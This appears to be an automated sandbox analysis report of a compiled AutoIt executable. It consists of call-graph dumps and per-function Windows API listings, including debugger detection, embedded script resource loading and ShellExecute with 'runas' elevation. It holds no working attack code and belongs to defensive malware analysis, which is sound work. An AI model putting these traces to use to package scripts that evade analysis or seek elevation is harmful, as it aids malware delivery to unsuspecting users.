100082->100084 100085 e79c9c 59 API calls 100083->100085 100087 e777c7 59 API calls 100084->100087 100127 edd3ea Mailbox 100084->100127 100085->100084 100086 e90ff6 Mailbox 59 API calls 100088 edd433 100086->100088 100089 edd334 100087->100089 100090 edd43f 100088->100090 100308 e75906 60 API calls Mailbox 100088->100308 100091 e777c7 59 API calls 100089->100091 100094 e79997 84 API calls 100090->100094 100093 edd33d 100091->100093 100095 e79997 84 API calls 100093->100095 100096 edd457 100094->100096 100097 edd349 100095->100097 100098 e75956 67 API calls 100096->100098 100099 e746f9 59 API calls 100097->100099 100100 edd466 100098->100100 100102 edd35e 100099->100102 100101 edd46a GetLastError 100100->100101 100104 edd49e 100100->100104 100107 edd483 100101->100107 100103 e77c8e 59 API calls 100102->100103 100109 edd391 100103->100109 100105 edd4c9 100104->100105 100106 edd500 100104->100106 100111 e90ff6 Mailbox 59 API calls 100105->100111 100108 e90ff6 Mailbox 59 API calls 100106->100108 100124 edd3f3 Mailbox 100107->100124 100309 e75a1a CloseHandle 100107->100309 100113 edd505 100108->100113 100110 edd3e3 100109->100110 100115 ed3e73 3 API calls 100109->100115 100114 e79c9c 59 API calls 100110->100114 100116 edd4ce 100111->100116 100120 e777c7 59 API calls 100113->100120 100113->100124 100114->100127 100118 edd3a1 100115->100118 100117 edd4df 100116->100117 100119 e777c7 59 API calls 100116->100119 100310 edf835 59 API calls 2 library calls 100117->100310 100118->100110 100121 edd3a5 100118->100121 100119->100117 100120->100124 100123 e77f41 59 API calls 100121->100123 100125 edd3b2 100123->100125 100124->100069 100307 ed3c66 63 API calls Mailbox 100125->100307 100127->100086 100127->100124 100128 edd3bb Mailbox 100128->100110 100130 e79997 84 API calls 100129->100130 100131 ee4787 100130->100131 100132 e763a0 94 API calls 100131->100132 100133 ee4797 100132->100133 100134 ee47bc 100133->100134 100135 e7a000 341 API calls 100133->100135 100137 ee47c0 100134->100137 100311 e79bf8 100134->100311 100135->100134 100137->100069 100139 e79bf8 59 API calls 100138->100139 100140 e8213b 100139->100140 100142 e90ff6 Mailbox 59 API calls 100140->100142 100144 eb69af 100140->100144 100143 e82154 100142->100143 100146 e82164 100143->100146 100339 e75906 60 API calls Mailbox 100143->100339 100145 e82189 100144->100145 100343 edf7df 59 API calls 100144->100343 100150 e79c9c 59 API calls 100145->100150 100155 e82196 100145->100155 100148 e79997 84 API calls 100146->100148 100149 e82172 100148->100149 100151 e75956 67 API calls 100149->100151 100152 eb69f7 100150->100152 100153 e82181 100151->100153 100154 eb69ff 100152->100154 100152->100155 100153->100144 100153->100145 100342 e75a1a CloseHandle 100153->100342 100157 e79c9c 59 API calls 100154->100157 100156 e75e3f 2 API calls 100155->100156 100159 e8219d 100156->100159 100157->100159 100160 eb6a11 100159->100160 100161 e821b7 100159->100161 100162 e90ff6 Mailbox 59 API calls 100160->100162 100163 e777c7 59 API calls 100161->100163 100164 eb6a17 100162->100164 100165 e821bf 100163->100165 100166 eb6a2b 100164->100166 100344 e759b0 ReadFile SetFilePointerEx 100164->100344 100324 e756d2 100165->100324 100172 eb6a2f _memmove 100166->100172 100345 ed794e 59 API calls 2 library calls 100166->100345 100168 e821ce 100168->100172 100340 e79b9c 59 API calls Mailbox 100168->100340 100173 e821e2 Mailbox 100174 e8221c 100173->100174 100175 e75dcf CloseHandle 100173->100175 100174->100069 100176 e82210 100175->100176 100176->100174 100341 e75a1a CloseHandle 100176->100341 100179 eecdf1 130 API calls 100178->100179 100180 eee247 100179->100180 100180->100069 100182 edd305 100181->100182 100183 edd310 100181->100183 100184 e79c9c 59 API calls 100182->100184 100186 e777c7 59 API calls 100183->100186 100226 edd3ea Mailbox 100183->100226 100184->100183 100185 e90ff6 Mailbox 59 API calls 100187 edd433 100185->100187 100188 edd334 100186->100188 100189 edd43f 100187->100189 100370 e75906 60 API calls Mailbox 100187->100370 100190 e777c7 59 API calls 100188->100190 100193 e79997 84 API calls 100189->100193 100192 edd33d 100190->100192 100194 e79997 84 API calls 100192->100194 100195 edd457 100193->100195 100196 edd349 100194->100196 100197 e75956 67 API calls 100195->100197 100198 e746f9 59 API calls 100196->100198 100199 edd466 100197->100199 100202 edd35e 100198->100202 100200 edd49e 100199->100200 100201 edd46a GetLastError 100199->100201 100206 edd4c9 100200->100206 100207 edd500 100200->100207 100203 edd483 100201->100203 100204 e77c8e 59 API calls 100202->100204 100220 edd3f3 Mailbox 100203->100220 100371 e75a1a CloseHandle 100203->100371 100205 edd391 100204->100205 100209 edd3e3 100205->100209 100214 ed3e73 3 API calls 100205->100214 100210 e90ff6 Mailbox 59 API calls 100206->100210 100208 e90ff6 Mailbox 59 API calls 100207->100208 100212 edd505 100208->100212 100213 e79c9c 59 API calls 100209->100213 100215 edd4ce 100210->100215 100218 e777c7 59 API calls 100212->100218 100212->100220 100213->100226 100216 edd3a1 100214->100216 100217 e777c7 59 API calls 100215->100217 100221 edd4df 100215->100221 100216->100209 100219 edd3a5 100216->100219 100217->100221 100218->100220 100223 e77f41 59 API calls 100219->100223 100220->100069 100372 edf835 59 API calls 2 library calls 100221->100372 100224 edd3b2 100223->100224 100369 ed3c66 63 API calls Mailbox 100224->100369 100226->100185 100226->100220 100227 edd3bb Mailbox 100227->100209 100229 e777c7 59 API calls 100228->100229 100230 eec608 100229->100230 100231 e777c7 59 API calls 100230->100231 100232 eec610 100231->100232 100233 e777c7 59 API calls 100232->100233 100234 eec618 100233->100234 100235 e79997 84 API calls 100234->100235 100259 eec626 100235->100259 100236 e77d2c 59 API calls 100236->100259 100237 e77a84 59 API calls 100237->100259 100238 eec80f 100239 eec83c Mailbox 100238->100239 100375 e79b9c 59 API calls Mailbox 100238->100375 100239->100060 100240 eec7f6 100243 e77e0b 59 API calls 100240->100243 100242 eec811 100245 e77e0b 59 API calls 100242->100245 100244 eec803 100243->100244 100247 e77c8e 59 API calls 100244->100247 100248 eec820 100245->100248 100246 e781a7 59 API calls 100246->100259 100247->100238 100250 e77c8e 59 API calls 100248->100250 100249 e77faf 59 API calls 100252 eec6bd CharUpperBuffW 100249->100252 100250->100238 100251 e77faf 59 API calls 100253 eec77d CharUpperBuffW 100251->100253 100373 e7859a 68 API calls 100252->100373 100374 e7c707 69 API calls 2 library calls 100253->100374 100256 e79997 84 API calls 100256->100259 100257 e77e0b 59 API calls 100257->100259 100258 e77c8e 59 API calls 100258->100259 100259->100236 100259->100237 100259->100238 100259->100239 100259->100240 100259->100242 100259->100246 100259->100249 100259->100251 100259->100256 100259->100257 100259->100258 100261 ed7bec 100260->100261 100262 e90ff6 Mailbox 59 API calls 100261->100262 100263 ed7bfa 100262->100263 100264 e777c7 59 API calls 100263->100264 100265 ed7c08 100263->100265 100264->100265 100265->100060 100376 ec6636 100266->100376 100268 ec6702 100268->100060 100269->100044 100270->100044 100271->100069 100272->100063 100273->100051 100274->100066 100275->100060 100276->100060 100277->100060 100278->100069 100279->100038 100280->100058 100281->100058 100282->100058 100283->100039 100284->100047 100285->100039 100287 e777c7 59 API calls 100286->100287 100288 ecf905 100287->100288 100289 e77b76 59 API calls 100288->100289 100290 ecf919 100289->100290 100291 ecf658 61 API calls 100290->100291 100298 ecf93b 100290->100298 100292 ecf935 100291->100292 100294 e779ab 59 API calls 100292->100294 100292->100298 100293 ecf658 61 API calls 100293->100298 100294->100298 100295 ecf9b5 100297 e779ab 59 API calls 100295->100297 100296 e779ab 59 API calls 100296->100298 100299 ecf9ce 100297->100299 100298->100293 100298->100295 100298->100296 100300 e77c8e 59 API calls 100298->100300 100301 e77c8e 59 API calls 100299->100301 100300->100298 100302 ecf9da 100301->100302 100304 ecf9e9 Mailbox 100302->100304 100306 e780d7 59 API calls 2 library calls 100302->100306 100304->100079 100305->100081 100306->100304 100307->100128 100308->100090 100309->100124 100310->100124 100312 eafbff 100311->100312 100313 e79c08 100311->100313 100314 eafc10 100312->100314 100315 e77d2c 59 API calls 100312->100315 100318 e90ff6 Mailbox 59 API calls 100313->100318 100316 e77eec 59 API calls 100314->100316 100315->100314 100317 eafc1a 100316->100317 100321 e777c7 59 API calls 100317->100321 100323 e79c34 100317->100323 100319 e79c1b 100318->100319 100319->100317 100320 e79c26 100319->100320 100322 e77f41 59 API calls 100320->100322 100320->100323 100321->100323 100322->100323 100323->100137 100325 e75702 100324->100325 100326 e756dd 100324->100326 100327 e77eec 59 API calls 100325->100327 100326->100325 100330 e756ec 100326->100330 100331 ed349a 100327->100331 100328 ed34c9 100328->100168 100348 e75c18 100330->100348 100331->100328 100346 ed3436 ReadFile SetFilePointerEx 100331->100346 100347 e77a84 59 API calls 2 library calls 100331->100347 100338 ed35d8 Mailbox 100338->100168 100339->100146 100340->100173 100341->100174 100342->100144 100343->100144 100344->100166 100345->100172 100346->100331 100347->100331 100349 e90ff6 Mailbox 59 API calls 100348->100349 100350 e75c2b 100349->100350 100351 e90ff6 Mailbox 59 API calls 100350->100351 100352 e75c37 100351->100352 100353 e75632 100352->100353 100360 e75a2f 100353->100360 100355 e75643 100356 e75d20 2 API calls 100355->100356 100357 e75674 100355->100357 100367 e75bda 59 API calls 2 library calls 100355->100367 100356->100355 100357->100338 100359 e7793a 61 API calls Mailbox 100357->100359 100359->100338 100361 e75a40 100360->100361 100362 eae065 100360->100362 100361->100355 100368 ec6443 59 API calls Mailbox 100362->100368 100364 eae06f 100365 e90ff6 Mailbox 59 API calls 100364->100365 100366 eae07b 100365->100366 100367->100355 100368->100364 100369->100227 100370->100189 100371->100220 100372->100220 100373->100259 100374->100259 100375->100239 100377 ec665e 100376->100377 100378 ec6641 100376->100378 100377->100268 100378->100377 100380 ec6621 59 API calls Mailbox 100378->100380 100380->100378 100381 e7e70b 100384 e7d260 100381->100384 100383 e7e719 100385 e7d27d 100384->100385 100413 e7d4dd 100384->100413 100386 eb2abb 100385->100386 100387 eb2b0a 100385->100387 100416 e7d2a4 100385->100416 100390 eb2abe 100386->100390 100398 eb2ad9 100386->100398 100428 eea6fb 341 API calls __cinit 100387->100428 100391 eb2aca 100390->100391 100390->100416 100426 eead0f 341 API calls 100391->100426 100392 e92f80 __cinit 67 API calls 100392->100416 100395 eb2cdf 100395->100395 100396 e7d594 100420 e78bb2 68 API calls 100396->100420 100397 e7d6ab 100397->100383 100398->100413 100427 eeb1b7 341 API calls 3 library calls 100398->100427 100402 e7d5a3 100402->100383 100403 eb2c26 100432 eeaa66 89 API calls 100403->100432 100406 e78620 69 API calls 100406->100416 100413->100397 100433 eda0b5 89 API calls 4 library calls 100413->100433 100414 e7a000 341 API calls 100414->100416 100415 e781a7 59 API calls 100415->100416 100416->100392 100416->100396 100416->100397 100416->100403 100416->100406 100416->100413 100416->100414 100416->100415 100418 e788a0 68 API calls __cinit 100416->100418 100419 e786a2 68 API calls 100416->100419 100421 e7859a 68 API calls 100416->100421 100422 e7d0dc 341 API calls 100416->100422 100423 e79f3a 59 API calls Mailbox 100416->100423 100424 e7d060 89 API calls 100416->100424 100425 e7cedd 341 API calls 100416->100425 100429 e78bb2 68 API calls 100416->100429 100430 e79e9c 60 API calls Mailbox 100416->100430 100431 ec6d03 60 API calls 100416->100431 100418->100416 100419->100416 100420->100402 100421->100416 100422->100416 100423->100416 100424->100416 100425->100416 100426->100397 100427->100413 100428->100416 100429->100416 100430->100416 100431->100416 100432->100413 100433->100395 100434 e7568a 100435 e75c18 59 API calls 100434->100435 100436 e7569c 100435->100436 100437 e75632 61 API calls 100436->100437 100438 e756aa 100437->100438 100440 e756ba Mailbox 100438->100440 100441 e781c1 MultiByteToWideChar 100438->100441 100442 e781e7 100441->100442 100443 e7822e 100441->100443 100445 e90ff6 Mailbox 59 API calls 100442->100445 100444 e77eec 59 API calls 100443->100444 100448 e78220 100444->100448 100446 e781fc MultiByteToWideChar 100445->100446 100449 e778ad 100446->100449 100448->100440 100450 e7792f 100449->100450 100451 e778bc 100449->100451 100452 e77e8c 59 API calls 100450->100452 100451->100450 100453 e778c8 100451->100453 100458 e778da _memmove 100452->100458 100454 e778d2 100453->100454 100455 e77900 100453->100455 100461 e78087 59 API calls Mailbox 100454->100461 100457 e78189 59 API calls 100455->100457 100459 e7790a 100457->100459 100458->100448 100460 e90ff6 Mailbox 59 API calls 100459->100460 100460->100458 100461->100458 100462 eb0226 100468 e7ade2 Mailbox 100462->100468 100464 eb0c86 100465 ec66f4 Mailbox 59 API calls 100464->100465 100466 eb0c8f 100465->100466 100468->100464 100468->100466 100469 eb00e0 VariantClear 100468->100469 100470 e7b6c1 100468->100470 100472 ef251d 62 API calls 100468->100472 100473 ee474d 341 API calls 100468->100473 100474 edd2e5 101 API calls 100468->100474 100475 eee237 130 API calls 100468->100475 100476 e82123 95 API calls 100468->100476 100477 edd2e6 101 API calls 100468->100477 100478 e79df0 59 API calls Mailbox 100468->100478 100479 ec7405 59 API calls 100468->100479 100469->100468 100480 eda0b5 89 API calls 4 library calls 100470->100480 100472->100468 100473->100468 100474->100468 100475->100468 100476->100468 100477->100468 100478->100468 100479->100468 100480->100464

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
                      • IsDebuggerPresent.KERNEL32 ref: 00E73B8C
                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                        • Part of subcall function 00E80A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E73C26,00F362F8,?,?,?), ref: 00E80ACE
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F293F0,00000010), ref: 00EAD4BC
                      • SetCurrentDirectoryW.KERNEL32(?,00F362F8,?,?,?), ref: 00EAD4F4
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F25D40,00F362F8,?,?,?), ref: 00EAD57A
                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EAD581
                        • Part of subcall function 00E73A58: GetSysColorBrush.USER32(0000000F), ref: 00E73A62
                        • Part of subcall function 00E73A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E73A71
                        • Part of subcall function 00E73A58: LoadIconW.USER32(00000063), ref: 00E73A88
                        • Part of subcall function 00E73A58: LoadIconW.USER32(000000A4), ref: 00E73A9A
                        • Part of subcall function 00E73A58: LoadIconW.USER32(000000A2), ref: 00E73AAC
                        • Part of subcall function 00E73A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E73AD2
                        • Part of subcall function 00E73A58: RegisterClassExW.USER32(?), ref: 00E73B28
                        • Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E73A15
                        • Part of subcall function 00E739E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73A36
                        • Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A4A
                        • Part of subcall function 00E739E7: ShowWindow.USER32(00000000,?,?), ref: 00E73A53
                        • Part of subcall function 00E743DB: _memset.LIBCMT ref: 00E74401
                        • Part of subcall function 00E743DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
                      Strings
                      • This is a third-party compiled AutoIt script., xrefs: 00EAD4B4
                      • runas, xrefs: 00EAD575
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                      • String ID: This is a third-party compiled AutoIt script.$runas
                      • API String ID: 529118366-3287110873
                      • Opcode ID: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
                      • Instruction ID: 89162eab67880fdb0adf224d47e762a37e89c00e0948072590d2b4969f634bec
                      • Opcode Fuzzy Hash: 56bf86de8d7ac7d97d0f6a24fe828240e62edcafc3e8570d4341edd52fe2b4d8
                      • Instruction Fuzzy Hash: 4751F770908248BECF11EBB4DC059FEBBB9AF49314F04D069F459F62A2DA709605EB21

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 942 e74fe9-e75001 CreateStreamOnHGlobal 943 e75003-e7501a FindResourceExW 942->943 944 e75021-e75026 942->944 945 eadd5c-eadd6b LoadResource 943->945 946 e75020 943->946 945->946 947 eadd71-eadd7f SizeofResource 945->947 946->944 947->946 948 eadd85-eadd90 LockResource 947->948 948->946 949 eadd96-eaddb4 948->949 949->946
                      APIs
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E74FF9
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E74EEE,?,?,00000000,00000000), ref: 00E75010
                      • LoadResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD60
                      • SizeofResource.KERNEL32(?,00000000,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F), ref: 00EADD75
                      • LockResource.KERNEL32(N,?,?,00E74EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E74F8F,00000000), ref: 00EADD88
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT$N
                      • API String ID: 3051347437-3852340653
                      • Opcode ID: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
                      • Instruction ID: 87944d9b6fdc1e4cd7b27243a14ce688262cbb3c2d3dd8cdceb09bdbaa860c24
                      • Opcode Fuzzy Hash: 4b61f102d6c5de5b11fb31beb970298999b58c8f5fa74f068e24d0e9760c08c8
                      • Instruction Fuzzy Hash: 20115E75200700AFE7218B66DC58F677BB9EFC9B51F108568F40AA6260DBA1E804C660

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1006 e74afe-e74b5e call e777c7 GetVersionExW call e77d2c 1011 e74b64 1006->1011 1012 e74c69-e74c6b 1006->1012 1013 e74b67-e74b6c 1011->1013 1014 eadb90-eadb9c 1012->1014 1016 e74b72 1013->1016 1017 e74c70-e74c71 1013->1017 1015 eadb9d-eadba1 1014->1015 1018 eadba3 1015->1018 1019 eadba4-eadbb0 1015->1019 1020 e74b73-e74baa call e77e8c call e77886 1016->1020 1017->1020 1018->1019 1019->1015 1021 eadbb2-eadbb7 1019->1021 1029 eadc8d-eadc90 1020->1029 1030 e74bb0-e74bb1 1020->1030 1021->1013 1023 eadbbd-eadbc4 1021->1023 1023->1014 1025 eadbc6 1023->1025 1028 eadbcb-eadbce 1025->1028 1031 e74bf1-e74c08 GetCurrentProcess IsWow64Process 1028->1031 1032 eadbd4-eadbf2 1028->1032 1033 eadca9-eadcad 1029->1033 1034 eadc92 1029->1034 1030->1028 1035 e74bb7-e74bc2 1030->1035 1042 e74c0d-e74c1e 1031->1042 1043 e74c0a 1031->1043 1032->1031 1036 eadbf8-eadbfe 1032->1036 1040 eadc98-eadca1 1033->1040 1041 eadcaf-eadcb8 1033->1041 1037 eadc95 1034->1037 1038 eadc13-eadc19 1035->1038 1039 e74bc8-e74bca 1035->1039 1046 eadc08-eadc0e 1036->1046 1047 eadc00-eadc03 1036->1047 1037->1040 1050 eadc1b-eadc1e 1038->1050 1051 eadc23-eadc29 1038->1051 1048 eadc2e-eadc3a 1039->1048 1049 e74bd0-e74bd3 1039->1049 1040->1033 1041->1037 1052 eadcba-eadcbd 1041->1052 1044 e74c20-e74c30 call e74c95 1042->1044 1045 e74c89-e74c93 GetSystemInfo 1042->1045 1043->1042 1063 e74c32-e74c3f call e74c95 1044->1063 1064 e74c7d-e74c87 GetSystemInfo 1044->1064 1053 e74c56-e74c66 1045->1053 1046->1031 1047->1031 1054 eadc3c-eadc3f 1048->1054 1055 eadc44-eadc4a 1048->1055 1057 eadc5a-eadc5d 1049->1057 1058 e74bd9-e74be8 1049->1058 1050->1031 1051->1031 1052->1040 1054->1031 1055->1031 1057->1031 1060 eadc63-eadc78 1057->1060 1061 eadc4f-eadc55 1058->1061 1062 e74bee 1058->1062 1065 eadc7a-eadc7d 1060->1065 1066 eadc82-eadc88 1060->1066 1061->1031 1062->1031 1071 e74c76-e74c7b 1063->1071 1072 e74c41-e74c45 GetNativeSystemInfo 1063->1072 1068 e74c47-e74c4b 1064->1068 1065->1031 1066->1031 1068->1053 1070 e74c4d-e74c50 FreeLibrary 1068->1070 1070->1053 1071->1072 1072->1068
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00E74B2B
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • GetCurrentProcess.KERNEL32(?,00EFFAEC,00000000,00000000,?), ref: 00E74BF8
                      • IsWow64Process.KERNEL32(00000000), ref: 00E74BFF
                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E74C45
                      • FreeLibrary.KERNEL32(00000000), ref: 00E74C50
                      • GetSystemInfo.KERNEL32(00000000), ref: 00E74C81
                      • GetSystemInfo.KERNEL32(00000000), ref: 00E74C8D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                      • String ID:
                      • API String ID: 1986165174-0
                      • Opcode ID: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
                      • Instruction ID: 6075e8bda6a9558f34c3cf92215762ff3a2642fc31fd78938656d15bd4ffff77
                      • Opcode Fuzzy Hash: 012f9275ce96f2008752e526fa74909459ce09f3052bb8b5f4d821f7577c0554
                      • Instruction Fuzzy Hash: 5F91C57154E7C4DEC732CB6884511AAFFE4AF6A304B44999ED0CFA7A41D320F948D729
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,00EAE7C1), ref: 00ED46A6
                      • FindFirstFileW.KERNELBASE(?,?), ref: 00ED46B7
                      • FindClose.KERNEL32(00000000), ref: 00ED46C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FileFind$AttributesCloseFirst
                      • String ID:
                      • API String ID: 48322524-0
                      • Opcode ID: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
                      • Instruction ID: ab3bcafd5a85c593a426c5c445e47f44fef6bcb6778d724cb23b73955f25bd4e
                      • Opcode Fuzzy Hash: 192ea9ecf11093b9808cd724c989de7bba72780b1413100801a7282145008be3
                      • Instruction Fuzzy Hash: 86E0D8714104005F52106738EC4D8FA775CDF96335F100716F936E12F0E7B09954C595
                      Strings
                      • Variable must be of type 'Object'., xrefs: 00EB428C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID: Variable must be of type 'Object'.
                      • API String ID: 0-109567571
                      • Opcode ID: 9d1a19da7d127a79a20dae3860019f15d20be263baf43fd5f0bb109ca15c4950
                      • Instruction ID: c9f890ce1824f14ccf59f09e9f8be581d5d99f293e9f36affa78a491f34081aa
                      • Opcode Fuzzy Hash: 9d1a19da7d127a79a20dae3860019f15d20be263baf43fd5f0bb109ca15c4950
                      • Instruction Fuzzy Hash: B7A26B75A04205CFCB24CF58C481AAEB7B2FF58314F2495A9E91ABB352D731ED42CB91
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80BBB
                      • timeGetTime.WINMM ref: 00E80E76
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E80FB3
                      • TranslateMessage.USER32(?), ref: 00E80FC7
                      • DispatchMessageW.USER32(?), ref: 00E80FD5
                      • Sleep.KERNEL32(0000000A), ref: 00E80FDF
                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00E8105A
                      • DestroyWindow.USER32 ref: 00E81066
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E81080
                      • Sleep.KERNEL32(0000000A,?,?), ref: 00EB52AD
                      • TranslateMessage.USER32(?), ref: 00EB608A
                      • DispatchMessageW.USER32(?), ref: 00EB6098
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EB60AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                      • API String ID: 4003667617-3242690629
                      • Opcode ID: 27ec84fa0d3c93ec693800e5d9928c3c50a0bcf1e902f1527d16f58d4ba29351
                      • Instruction ID: 3fee2f9fe86898ecad0a189ec015de27ed6f054d24cc2ef337d6ea1afe1fedc6
                      • Opcode Fuzzy Hash: 27ec84fa0d3c93ec693800e5d9928c3c50a0bcf1e902f1527d16f58d4ba29351
                      • Instruction Fuzzy Hash: 3DB2D371608741DFD728DF24C884BABB7E5BF84308F14991DE49DA72A1DB71E849CB82

                      Control-flow Graph

                      APIs
